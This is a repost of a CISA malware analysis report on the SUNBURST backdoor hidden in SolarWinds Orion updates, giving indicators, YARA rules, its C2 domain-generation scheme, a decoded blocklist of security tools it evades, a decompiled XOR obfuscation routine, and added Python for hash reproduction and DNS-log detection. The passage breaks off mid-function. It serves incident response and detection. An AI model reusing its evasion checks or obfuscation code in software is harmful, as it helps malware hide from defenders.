by Scott Muniz | Feb 8, 2021 | Security, Technology
This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.
This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.
Description
This report provides detailed analysis of several malicious artifacts associated with a sophisticated supply chain compromise of SolarWinds Orion network management software, identified by the security company FireEye as SUNBURST.
After being delivered as part of certain SolarWinds updates, a trojanized version of "SolarWinds.Orion.Core.BusinessLayer.dll" containing the SUNBURST malware is installed by a legitimate SolarWinds installer application. The modified dynamic-link library (DLL) contains an obfuscated backdoor that allows a remote operator to execute various functions on the compromised system, deploy additional payloads, and exfiltrate data. The embedded SUNBURST code obfuscates its outbound communications to the remote operator with a single-byte XOR key followed by a custom encoding that the sample calls Base64 (in practice a 32-character, 5-bit alphabet; see the CryptoHelper analysis below). To maintain a low profile, the SUNBURST code will not run if it detects certain security software or analysis tools running on the target system.
For a downloadable copy of IOCs, see: MAR-10318845-1.v1.stix.
Submitted Files (4)
019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 (SolarWinds.Orion.Core.Business…)
32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 (SolarWinds.Orion.Core.Business…)
ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 (SolarWinds.Orion.Core.Business…)
d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 (SolarWinds-Core-v2019.4.5220-H…)
Domains (1)
avsvmcloud.com
32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77
Tags
backdoor, remote-access-trojan, trojan
Details
| Name | SolarWinds.Orion.Core.BusinessLayer.dll |
| Size | 1011032 bytes |
| Type | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows |
| MD5 | b91ce2fa41029f6955bff20079468448 |
| SHA1 | 76640508b1e7759e548771a5359eaed353bf1eec |
| SHA256 | 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 |
| SHA512 | 6a81f082f36ccbda48070772c5a97e1d7de61ad77465e7befe8cbd97df40dcc5da09c461311708e3d57527e323484b05cfd3e72a3c70e106e47f44cc77584bd7 |
| ssdeep | 12288:Zx7m/z9aEBzvnvLtYAi6uLlYQ69BBpIvF1tjpH7BKi+0A8vca9owQ:6aEBTvRBi6uL6dIvDtjpH9+0A8vca9oD |
| Entropy | 5.582827 |
Antivirus
| Ahnlab | Backdoor/Win32.SunBurst |
| Antiy | Trojan[Backdoor]/MSIL.Agent |
| Avira | TR/Sunburst.AO |
| BitDefender | Trojan.Sunburst.A |
| Clamav | Win.Countermeasure.Sunburst-9809152-0 |
| Comodo | Backdoor |
| Cyren | W32/Trojan.BCCG-2955 |
| ESET | a variant of MSIL/SunBurst.A trojan |
| Emsisoft | Trojan.Win32.Sunburst (A) |
| Ikarus | Backdoor.Sunburst |
| K7 | Trojan ( 00574a531 ) |
| Lavasoft | Trojan.Sunburst.A |
| McAfee | Trojan-sunburst |
| Microsoft Security Essentials | Trojan:MSIL/Solorigate.BR!dha |
| NANOAV | Trojan.Win32.SunBurst.iduxjk |
| Sophos | Mal/Sunburst-A |
| Symantec | Backdoor.Sunburst!gen1 |
| Systweak | trojan-backdoor.sunburst-r |
| TrendMicro | Backdoo.6F8C6A1E |
| TrendMicro House Call | Backdoo.6F8C6A1E |
| Vir.IT eXplorer | Trojan.Win32.SunBurst.A |
| VirusBlokAda | TScope.Trojan.MSIL |
| Zillya! | Backdoor.Sunburst.Win32.2 |
YARA Rules
rule CISA_10318927_01 : trojan rat SOLAR_FIRE
{
    meta:
        Author = "CISA Code & Media Analysis"
        Incident = "10318927"
        Date = "2020-12-13"
        Last_Modified = "20201213_2145"
        Actor = "n/a"
        Category = "TROJAN RAT"
        Family = "SOLAR_FIRE"
        Description = "This signature is based off of unique strings embedded within the modified Solar Winds app"
        MD5_1 = "b91ce2fa41029f6955bff20079468448"
        SHA256_1 = "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77"
        MD5_2 = "846e27a652a5e1bfbd0ddd38a16dc865"
        SHA256_2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6"
    strings:
        $s0 = { 63 00 30 00 6B 00 74 00 54 00 69 00 37 00 4B 00 4C 00 43 00 6A 00 4A 00 7A 00 4D 00 38 00 44 }
        $s1 = { 41 00 41 00 3D 00 3D 00 00 21 38 00 33 00 56 00 30 00 64 00 6B 00 78 00 4A 00 4B 00 55 }
        $s2 = { 63 00 2F 00 46 00 77 00 44 00 6E 00 44 00 4E 00 53 00 30 00 7A 00 4B 00 53 00 55 00 30 00 42 00 41 00 41 00 3D 00 3D }
        $s3 = { 53 00 69 00 30 00 75 00 42 00 67 00 41 00 3D 00 00 21 38 00 77 00 77 00 49 00 4C 00 6B 00 33 00 4B 00 53 00 79 00 30 00 42 }
    condition:
        all of them
}
rule FireEye_20_00025668_01 : SUNBURST APT backdoor
{
    meta:
        Author = "FireEye"
        Date = "2020-12-13"
        Last_Modified = "20201213_1917"
        Actor = "n/a"
        Category = "Backdoor"
        Family = "SUNBURST"
        Description = "This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions. The first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver names/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."
        MD5_1 = ""
        SHA256_1 = ""
    strings:
        $cmd_regex_encoded = "U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA" wide
        $cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }
        $fake_orion_event_encoded = "U3ItS80rCaksSFWyUvIvyszPU9IBAA==" wide
        $fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }
        $fake_orion_eventmanager_encoded = "U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==" wide
        $fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67 65 72 22 2C }
        $fake_orion_message_encoded = "U/JNLS5OTE9VslKqNqhVAgA=" wide
        $fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }
        $fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }
    condition:
        $fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or $fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and ($fake_orion_message_encoded and $fake_orion_message_plain) )
}
rule FireEye_20_00025668_02 : SUNBURST APT backdoor
{
    meta:
        Author = "FireEye"
        Date = "2020-12-13"
        Last_Modified = "20201213_1917"
        Actor = "n/a"
        Category = "Backdoor"
        Family = "SUNBURST"
        Description = "The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2 communications. This rule is looking for each branch of the code that checks for which HTTP method is being used. This is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally designed so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."
        MD5_1 = ""
        SHA256_1 = ""
    strings:
        $a = "0y3Kzy8BAA==" wide
        $aa = "S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA" wide
        $ab = "S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=" wide
        $ac = "C88sSs1JLS4GAA==" wide
        $ad = "C/UEAA==" wide
        $ae = "C89MSU8tKQYA" wide
        $af = "8wvwBQA=" wide
        $ag = "cyzIz8nJBwA=" wide
        $ah = "c87JL03xzc/LLMkvysxLBwA=" wide
        $ai = "88tPSS0GAA==" wide
        $aj = "C8vPKc1NLQYA" wide
        $ak = "88wrSS1KS0xOLQYA" wide
        $al = "c87PLcjPS80rKQYA" wide
        $am = "Ky7PLNAvLUjRBwA=" wide
        $an = "06vIzQEA" wide
        $b = "0y3NyyxLLSpOzIlPTgQA" wide
        $c = "001OBAA=" wide
        $d = "0y0oysxNLKqMT04EAA==" wide
        $e = "0y3JzE0tLknMLQAA" wide
        $f = "003PyU9KzAEA" wide
        $h = "0y1OTS4tSk1OBAA=" wide
        $i = "K8jO1E8uytGvNqitNqytNqrVA/IA" wide
        $j = "c8rPSQEA" wide
        $k = "c8rPSfEsSczJTAYA" wide
        $l = "c60oKUp0ys9JAQA=" wide
        $m = "c60oKUp0ys9J8SxJzMlMBgA=" wide
        $n = "8yxJzMlMBgA=" wide
        $o = "88lMzygBAA==" wide
        $p = "88lMzyjxLEnMyUwGAA==" wide
        $q = "C0pNL81JLAIA" wide
        $r = "C07NzXTKz0kBAA==" wide
        $s = "C07NzXTKz0nxLEnMyUwGAA==" wide
        $t = "yy9IzStOzCsGAA==" wide
        $u = "y8svyQcA" wide
        $v = "SytKTU3LzysBAA==" wide
        $w = "C84vLUpOdc5PSQ0oygcA" wide
        $x = "C84vLUpODU4tykwLKMoHAA==" wide
        $y = "C84vLUpO9UjMC07MKwYA" wide
        $z = "C84vLUpO9UjMC04tykwDAA==" wide
    condition:
        ($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q and $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad and $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an))
}
ssdeep Matches
No matches found.
PE Metadata
| Compile Date | 2020-03-24 04:52:34-04:00 |
| Import Hash | dae02f32a21e03ce65412f6e56942daa |
| Company Name | SolarWinds Worldwide, LLC. |
| File Description | SolarWinds.Orion.Core.BusinessLayer |
| Internal Name | SolarWinds.Orion.Core.BusinessLayer.dll |
| Legal Copyright | Copyright © 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved. |
| Original Filename | SolarWinds.Orion.Core.BusinessLayer.dll |
| Product Name | SolarWinds.Orion.Core.BusinessLayer |
| Product Version | 2019.4.5200.9083 |
PE Sections
| MD5 | Name | Raw Size | Entropy |
| 9f1dcf8b4df81fdd1e33e8157fb58d9f | header | 512 | 2.890704 |
| ac9dc455a67c7f2c9f10725d66c115d1 | .text | 1001472 | 5.569219 |
| 69a064c0b6001299af109ed0d06f6c6f | .rsrc | 1536 | 3.015713 |
| 275a7e1f11b8e5fefa163e47c22129b4 | .reloc | 512 | 0.101910 |
Relationships
| 32519b85c0… | Connected_To | avsvmcloud.com |
| 32519b85c0… | Contained_Within | d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 |
Description
This file is a 32-bit .NET DLL named "SolarWinds.Orion.Core.BusinessLayer.dll". It is a modified, SolarWinds-signed plugin component of the Orion software framework that has been patched with the SUNBURST backdoor. The malicious file carries a valid Authenticode signature from a certificate issued by Symantec to SolarWinds (details below). Because the backdoored build was signed with SolarWinds' own code-signing certificate, signature verification succeeds on this file and cannot be relied on to detect it; the certificate should be considered compromised.
–Begin Digital Certificate Information–
Signer: CN=”Solarwinds Worldwide, LLC”, O=”Solarwinds Worldwide, LLC”, L=Austin, S=Texas, C=US
Issuer: CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US
SN: 0FE973752022A606ADF2A36E345DC0ED
Not Before: 1/20/2020 7:00:00 PM
Not After: 1/20/2023 6:59:59 PM
Thumbprint: 47D92D49E6F7F296260DA1AF355F941EB25360C4
Status: Valid
StatusMsg: Signature verified.
–End Digital Certificate Information–
SUNBURST provides the following capabilities on a compromised system, which are discussed in further detail below.
– Sets a 12 to 14 day delayed execution time
– Stealth
– Command and Control (C2) communication
– Collect system information
– Upload system information from the victim system
– Run specified tasks
– Terminate processes
– Download, read, write, move, delete, and execute files
– Compute file hashes
– Reboot the system
– Adjust process privileges
**DELAYED EXECUTION**
SUNBURST is executed by a legitimate SolarWinds software application designed to load and run SolarWinds plugins (the Orion host process; see the parent-process check under Command and Control below). Once installed, it computes a random delay of 288 to 336 hours (12 to 14 days) measured from the DLL's last write time and sleeps until that time has passed. Only then does the malware begin C2 sessions to retrieve and execute commands, or "Jobs", on behalf of the adversary. The delay puts initial beaconing well outside the window in which an update is normally tested or watched.
**STEALTH**
SUNBURST uses obfuscated blocklists of hashed process, service, and driver names to identify analysis tools and antivirus software components running on the target system. Names are hashed with a modified version of the 64-bit FNV-1a algorithm (the result is XORed with a fixed constant, the byte sequence matched by the $fnv_xor string in the FireEye YARA rule above), so the malware never carries the plaintext names. It enumerates all running processes, hashes each lowercased process name, and compares the generated hashes to the hard-coded list. If no block-listed process is found, it attempts to resolve the domain "api.solarwinds.com" to test for network connectivity; if a block-listed process is found, it does not proceed with its C2 session. This evasion technique keeps the backdoor from being observed by exactly the tools an analyst or endpoint product would use. The hard-coded hashes are stored in a list of unsigned 64-bit integers (ulong) named "assemblyTimeStamps". The decoded list below mixes several categories of hashed strings: process, service and driver names; the HTTP header names and values that UploadSystemDescription matches by hash (for example "accept" and "content-type"); domain-name fragments such as "dev.local"; and the expected parent process name "solarwinds.businesslayerhost". See "**BLOCK LIST CHECKING FUNCTIONS**" below in this report for details.
–Begin hard-coded list of block-listed processes and names–
1475579823244607677 100-continue
2734787258623754862 accept
1368907909245890092 afwserv
16858955978146406642 apac.lab
2597124982561782591 apimonitor-x64
2600364143812063535 apimonitor-x86
6195833633417633900 aswengsrv
2934149816356927366 aswidsagent
13029357933491444455 aswidsagenta
15194901817027173566 atrsdfw.sys
4821863173800309721 autopsy
13464308873961738403 autopsy64
3320026265773918739 autoruns
12969190449276002545 autoruns64
10657751674541025650 autorunsc
12094027092655598256 autorunsc64
2760663353550280147 avastavwrapper
8146185202538899243 avastsvc
11818825521849580123 avastui
11109294216876344399 avgadminclientservice
2797129108883749491 avgidsagent
3660705254426876796 avgsvc
3890794756780010537 avgsvca
3890769468012566366 avgsvcx
12709986806548166638 avgui
14095938998438966337 avgwdsvcx
13611051401579634621 avp
18147627057830191163 avpui
16423314183614230717 bccavsvc
11913842725949116895 binaryninja
5449730069165757263 blacklight
12679195163651834776 brcow_x_x_x_x.sys
1614465773938842903 brfilter.sys
11385275378891906608 carbonblack
13693525876560827283 carbonblackk
17204844226884380288 cavp
5984963105389676759 cb
17849680105131524334 cbcomms
18246404330670877335 cbstream
292198192373389586 cff explorer
14226582801651130532 close
11266044540366291518 connection
6116246686670134098 content-type
10734127004244879770 cork.lab
18159703063075866524 crexecprev.sys
11771945869106552231 csagent
9234894663364701749 csdevicecontrol
9061219083560670602 csfalconcontainer
8698326794961817906 csfalconservice
12790084614253405985 cutter
16570804352575357627 cve.sys
17097380490166623672 cybkerneltracker.sys
16066522799090129502 date
5219431737322569038 de4dot
15535773470978271326 debugview
11073283311104541690 dev.local
3626142665768487764 dgdmk.sys
7810436520414958497 diskmon
4030236413975199654 dmz.local
13316211011159594063 dnsd
13825071784440082496 dnspy
14480775929210717493 dotpeek32
14482658293117931546 dotpeek64
8473756179280619170 dumpcap
15587050164583443069 eamonm
12718416789200275332 eaw.sys
9559632696372799208 eelam
607197993339007484 egui
14513577387099045298 eguiproxy
4931721628717906635 ehdrv
14079676299181301772 ekbdflt
3200333496547938354 ekrn
2589926981877829912 ekrnepfw
8727477769544302060 emea.sales
17939405613729073960 epfw
17997967489723066537 epfwwfp
3778500091710709090 evidence center
8799118153397725683 exeinfope
8873858923435176895 expect
13783346438774742614 f-secure filter
16112751343173365533 f-secure gatekeeper
17624147599670377042 f-secure gatekeeper handler starter
3425260965299690882 f-secure hips
16066651430762394116 f-secure network request broker
2380224015317016190 f-secure recognizer
13655261125244647696 f-secure webui daemon
12027963942392743532 fakedns
576626207276463000 fakenet
9384605490088500348 fe_avk
15092207615430402812 feelam
6274014997237900919 fekern
3320767229281015341 fewscservice
7412338704062093516 ffdec
682250828679635420 fiddler
13014156621614176974 fileinsight
18150909006539876521 floss
5587557070429522647 fnrb32
12445177985737237804 fsaua
12445232961318634374 fsaus
17017923349298346219 fsav32
9333057603143916814 fsbts
541172992193764396 fsdevcon
10393903804869831898 fsdfw
3413052607651207697 fses
3407972863931386250 fsfw
10545868833523019926 fsgk32
521157249538507889 fsgk32st
3421213182954201407 fsma
15039834196857999838 fsma32
3421197789791424393 fsms
3413886037471417852 fsni
17978774977754553159 fsorsp
14243671177281069512 fsorspclient
14055243717250701608 fssm32
7315838824213522000 fsvista
14971809093655817917 fswebuid
10336842116636872171 gdb
6943102301517884811 groundling32.sys
13544031715334011032 groundling64.sys
397780960855462669 hexisfsmonitor.sys
13260224381505715848 hiew32
12785322942775634499 hiew32demo
17956969551821596225 hollows_hunter
14256853800858727521 idaq
8709004393777297355 idaq64
8129411991672431889 idr
15514036435533858158 if-modified-since
15997665423159927228 ildasm
10829648878147112121 ilspy
9149947745824492274 jd-gui
13852439084267373191 keep-alive
17633734304611248415 ksde
13581776705111912829 ksdeui
4578480846255629462 lab.brno
8381292265993977266 lab.local
3796405623695665524 lab.na
5942282052525294911 lab.rio
17984632978012874803 libwamf.sys
3656637464651387014 lordpe
2717025511528702475 lragentmf.sys
10501212300031893463 microsoft.tri.sensor
155978580751494388 microsoft.tri.sensor.updater
5183687599225757871 msmpeng
10063651499895178962 mssense
3575761800716667678 officemalscanner
4501656691368064027 ollydbg
7701683279824397773 pci.local
10296494671777307979 pdfstreamdumper
14630721578341374856 pe-bear
6461429591783621719 pe-sieve32
6508141243778577344 pe-sieve64
4088976323439621041 pebrowse64
9531326785919727076 peid
10235971842993272939 pestudio
2478231962306073784 peview
9903758755917170407 pexplorer
14710585101020280896 ppee
2810460305047003196 procdump
13611814135072561278 procdump64
2032008861530788751 processhacker
6491986958834001955 procexp
27407921587843457 procexp64
2128122064571842954 procmon
10484659978517092504 prodiscoverbasic
2532538262737333146 psanhost
835151375515278827 psepfilter.sys
6088115528707848728 psuamain
4454255944391929578 psuaservice
8478833628889826985 py2exedecompiler
10463926208560207521 r2agent
7080175711202577138 rabin2
8697424601205169055 radare2
16130138450758310172 ramcapture
7775177810774851294 ramcapture64
700598796416086955 redcloak
9007106680104765185 referer
506634811745884560 reflector
18294908219222222902 regmon
3588624367609827560 resourcehacker
9555688264681862794 retdec-ar-extractor
5415426428750045503 retdec-bin2llvmir
3642525650883269872 retdec-bin2pat
13135068273077306806 retdec-config
3769837838875367802 retdec-fileinfo
191060519014405309 retdec-getsig
1682585410644922036 retdec-idr2pat
7878537243757499832 retdec-llvmir2hll
13799353263187722717 retdec-macho-extractor
1367627386496056834 retdec-pat2yara
12574535824074203265 retdec-stacofin
16990567851129491937 retdec-unpacker
8994091295115840290 retdec-yarac
13876356431472225791 rundotnetdll
18392881921099771407 rvsavd.sys
5132256620104998637 saas.swi
11801746708619571308 safe-agent.sys
14968320160131875803 sbiesvc
14868920869169964081 scdbg
106672141413120087 scylla_x64
79089792725215063 scylla_x86
16335643316870329598 sense
12343334044036541897 sentinelmonitor.sys
5614586596107908838 shellcode_launcher
17291806236368054941 solarwinds.businesslayerhost
3869935012404164040 solarwindsdiagnostics
15267980678929160412 swdev.dmz
1109067043404435916 swdev.local
14111374107076822891 sysmon
3538022140597504361 sysmon64
7175363135479931834 tanium
3178468437029279937 taniumclient
13599785766252827703 taniumdetectengine
6180361713414290679 taniumendpointindex
8612208440357175863 taniumtracecli
8408095252303317471 taniumtracewebsocketclient64
7982848972385914508 task explorer
8760312338504300643 task explorer-64
17351543633914244545 tcpdump
7516148236133302073 tcpvcon
15114163911481793350 tcpview
7574774749059321801 user-agent
15457732070353984570 vboxservice
16292685861617888592 win32_remote
10374841591685794123 win64_remotex64
3045986759481489935 windbg
917638920165491138 windefend
17109238199226571972 windump
5945487981219695001 winhex
6827032273910657891 winhex64
8052533790968282297 winobj
17574002783607647274 wireshark
3341747963119755850 x32dbg
14193859431895170587 x64dbg
15695338751700748390 xagt
640589622539783622 xagtnotif
17683972236092287897 xwforensics
17439059603042731363 xwforensics64
–End hard-coded list of block-listed processes and names–
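The following is an added example, not code from the report or from the sample: a Python reimplementation of the hash SUNBURST applies to process, service, driver and HTTP header names, with helpers that recompute entries of the list above and apply the same check to a process listing. The algorithm is 64-bit FNV-1a over the UTF-8 bytes of the (lowercased) name, XORed with the constant whose little-endian bytes are the $fnv_xor string in the FireEye YARA rule (67 19 D8 A7 3B 90 AC 5B). The process names fed to it are constructed input; stripping ".exe" before hashing is an assumption about that input (.NET's Process.ProcessName carries no extension).

```python
"""SUNBURST name hashing (added example, not the sample's own code)."""
from __future__ import annotations

FNV64_OFFSET = 0xCBF29CE484222325   # standard FNV-1a 64-bit offset basis
FNV64_PRIME = 0x100000001B3         # standard FNV-1a 64-bit prime
SUNBURST_XOR = 0x5BAC903BA7D81967   # post-hash XOR; little-endian bytes 67 19 D8 A7 3B 90 AC 5B
MASK64 = (1 << 64) - 1


def sunburst_hash(name: str) -> int:
    """FNV-1a (64-bit) over the UTF-8 bytes, then XOR with the SUNBURST constant.
    The malware lowercases names before calling this; callers here do the same."""
    h = FNV64_OFFSET
    for b in name.encode("utf-8"):
        h ^= b
        h = (h * FNV64_PRIME) & MASK64
    return h ^ SUNBURST_XOR


# Extracts of the decoded list above, keyed by the numeric hash the report gives.
BLOCKLIST_EXTRACT = {
    14111374107076822891: "sysmon",
    3538022140597504361: "sysmon64",
    17574002783607647274: "wireshark",
    6491986958834001955: "procexp",
    2032008861530788751: "processhacker",
    2810460305047003196: "procdump",
}
HTTP_HEADER_HASHES = {
    2734787258623754862: "accept",
    6116246686670134098: "content-type",
    7574774749059321801: "user-agent",
    1475579823244607677: "100-continue",
}
PARENT_PROCESS_HASH = 17291806236368054941   # "solarwinds.businesslayerhost"


def verify_table(table: dict[int, str]) -> list[int]:
    """Hashes in `table` that sunburst_hash() does NOT reproduce (expected: none)."""
    return [h for h, name in table.items() if sunburst_hash(name) != h]


def resolve_hashes(hashes: list[int], candidates: list[str]) -> dict[int, str | None]:
    """Brute-force numeric hashes against a wordlist; this is how the list was decoded."""
    lookup = {sunburst_hash(c.lower()): c.lower() for c in candidates}
    return {h: lookup.get(h) for h in hashes}


def _basename(image: str) -> str:
    """Lowercase and drop a trailing .exe (assumed input: Windows image names)."""
    base = image.lower()
    return base[:-4] if base.endswith(".exe") else base


def blocked_processes(image_names: list[str]) -> list[str]:
    """Image names whose hash is on the blocklist; any hit keeps SUNBURST dormant."""
    return [img for img in image_names if sunburst_hash(_basename(img)) in BLOCKLIST_EXTRACT]


def runs_in_expected_parent(parent_image: str) -> bool:
    """The parent-process check described under COMMAND AND CONTROL below."""
    return sunburst_hash(_basename(parent_image)) == PARENT_PROCESS_HASH


if __name__ == "__main__":
    # Constructed process listing for the demonstration.
    running = ["svchost.exe", "Sysmon64.exe", "explorer.exe", "wireshark.exe"]
    print("unreproduced hashes:", verify_table(BLOCKLIST_EXTRACT) + verify_table(HTTP_HEADER_HASHES))
    print("blocklisted processes present:", blocked_processes(running))
    print("host is Orion BusinessLayerHost:", runs_in_expected_parent("SolarWinds.BusinessLayerHost.exe"))
```

The verify_table() check is the useful part for a detection engineer: if it returns an empty list, the hash is implemented correctly and the full 200-plus entry list above can be loaded the same way to decide, from a process inventory, whether a given host would have kept the backdoor dormant or let it beacon.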
**COMMAND AND CONTROL**
During runtime, SUNBURST hashes the name of its own parent process and compares it to the value 17291806236368054941, which is the hash of "solarwinds.businesslayerhost" in the list above. If it does not match, the malicious class "OrionImprovementBusinessLayer" stops executing and the DLL continues its normal activity; the backdoor only runs inside the legitimate Orion host process.
When communicating with its C2, SUNBURST utilizes the Orion Improvement Program (OIP) protocol to disguise network activity as normal SolarWinds Orion traffic. The connection with the C2 server will contain a randomly generated “customer ID” that allows the adversary to track different compromised systems.
To establish C2, it constructs and resolves subdomains of "avsvmcloud.com" using a domain generation algorithm (DGA). The generated label is prepended to one of the following suffixes:
–Begin format of the domain name–
<DGA label>.appsync-api.eu-west-1.avsvmcloud.com
<DGA label>.appsync-api.us-west-2.avsvmcloud.com
<DGA label>.appsync-api.us-east-1.avsvmcloud.com
<DGA label>.appsync-api.us-east-2.avsvmcloud.com
–End format of the domain name–
It attempts a Canonical Name (CNAME) query for each DGA-generated name under the different third-level domains to verify that the C2 server is reachable before starting its command and control session.
–Begin domain names combined with DGA–
6a57jk2ba1d9keg15cbg.appsync-api.eu-west-1.avsvmcloud.com
7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com
gq1h856599gqh538acqn.appsync-api.us-west-2.avsvmcloud.com
ihvpgv9psvq02ffo77et.appsync-api.us-east-2.avsvmcloud.com
k5kcubuassl3alrf7gm3.appsync-api.eu-west-1.avsvmcloud.com
mhdosoksaccf9sni9icp.appsync-api.eu-west-1.avsvmcloud.com
–End domain names plus DGA–
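As an added example that is not part of the report, the following Python turns the domain format above into a check that can be run over DNS query logs: it extracts the generated label and region from any lookup matching the pattern, and separately flags any other query under avsvmcloud.com. The log lines are constructed for the example, and their layout (timestamp, client, query name, record type, space separated) is an assumption; adapt the split to your resolver's format.

```python
"""Pick SUNBURST DGA lookups out of DNS query logs (added example)."""
from __future__ import annotations

import re
from typing import NamedTuple

# The four region-labelled parents under avsvmcloud.com listed in the report.
DGA_REGIONS = ("eu-west-1", "us-west-2", "us-east-1", "us-east-2")

# One generated label of lower-case letters/digits, then the fixed suffix. The
# report's samples all have 20-character labels, but no length is assumed here.
DGA_RE = re.compile(
    r"^(?P<label>[0-9a-z]+)\.appsync-api\.(?P<region>"
    + "|".join(re.escape(r) for r in DGA_REGIONS)
    + r")\.avsvmcloud\.com\.?$",
    re.IGNORECASE,
)
IOC_SUFFIX = ".avsvmcloud.com"


class DgaHit(NamedTuple):
    timestamp: str
    client: str
    label: str
    region: str
    qtype: str


def parse_dga_domain(qname: str) -> tuple[str, str] | None:
    """(label, region) if qname matches the DGA format, else None."""
    m = DGA_RE.match(qname.strip())
    if m is None:
        return None
    return m.group("label").lower(), m.group("region").lower()


def classify(qname: str) -> str | None:
    """'dga' for a full DGA name, 'ioc-domain' for anything else under avsvmcloud.com."""
    name = qname.strip().rstrip(".").lower()
    if parse_dga_domain(name):
        return "dga"
    if name == IOC_SUFFIX[1:] or name.endswith(IOC_SUFFIX):
        return "ioc-domain"
    return None


def find_dga_queries(log_lines: list[str]) -> list[DgaHit]:
    """Scan log lines and return every DGA lookup together with its source client."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        ts, client, qname, qtype = parts[:4]
        parsed = parse_dga_domain(qname)
        if parsed:
            hits.append(DgaHit(ts, client, parsed[0], parsed[1], qtype))
    return hits


# Constructed sample log. The api.solarwinds.com line is the connectivity test
# described above; it is also ordinary product traffic, so it is not flagged.
SAMPLE_LOG = """\
2020-12-14T03:12:05Z 10.20.30.41 6a57jk2ba1d9keg15cbg.appsync-api.eu-west-1.avsvmcloud.com CNAME
2020-12-14T03:12:06Z 10.20.30.41 api.solarwinds.com A
2020-12-14T03:12:09Z 10.20.30.77 7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com CNAME
2020-12-14T03:13:00Z 10.20.30.12 www.example.com A
2020-12-14T03:13:02Z 10.20.30.41 appsync-api.us-east-1.avsvmcloud.com A
""".splitlines()

if __name__ == "__main__":
    for hit in find_dga_queries(SAMPLE_LOG):
        print(f"{hit.timestamp} {hit.client} DGA label={hit.label} region={hit.region} ({hit.qtype})")
```

The label is worth keeping in the alert rather than just the suffix: it is derived per victim, so the same label seen from two clients, or several labels from one client, tells the responder something the bare domain hit does not.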
Outbound communications are obfuscated by an embedded class named "CryptoHelper", which contains two functions, "CreateSecureString" and "Base64Encode". CreateSecureString takes two arguments: a byte array holding the data to encode, and a bool. It draws a random key byte in the range 1 to 126 (Random.Next(1, 127)); if the bool is true, the key is ORed with 128, so the high bit of the key carries the flag to the receiving side. Every data byte is XORed with the key, and the key itself is stored at offset 0x00 of the output, which is what lets the operator (or an analyst holding a capture) recover the plaintext. The result is then passed to Base64Encode for a further layer of obfuscation. This is obfuscation rather than encryption: the key travels with the message.
–Begin CreateSecureString Function–
private static string CreateSecureString(byte[] data, bool flag)
{
    byte[] bytes = new byte[data.Length + 1];
    bytes[0] = (byte)new Random().Next(1, (int)sbyte.MaxValue);
    if (flag)
        bytes[0] |= (byte)128;
    for (int index = 1; index < bytes.Length; ++index)
        bytes[index] = (byte)((uint)data[index - 1] ^ (uint)bytes[0]);
    return Base64Encode(bytes, true);
}
–End CreateSecureString Function–
The Base64Encode function is not standard Base64 despite its name: it consumes the input five bits at a time (the `& 31` mask and the shift by 5 in the loop below) and maps each 5-bit group onto the 32-character custom alphabet "ph2eifo3n5utg1j8d94qrvbmk0sal76c", which the code recovers at runtime from a compressed, Base64-encoded blob via ZipHelper.Unzip. When the `rt` argument is true, the unused high bits of the final character are filled with random bits, so the same input can produce different trailing characters. Standard Base64 or Base32 decoders will therefore not decode this traffic; the custom alphabet and the least-significant-bit-first packing order are both needed.
–Begin Base64Encode Function–
private static string Base64Encode(byte[] bytes, bool rt)
{
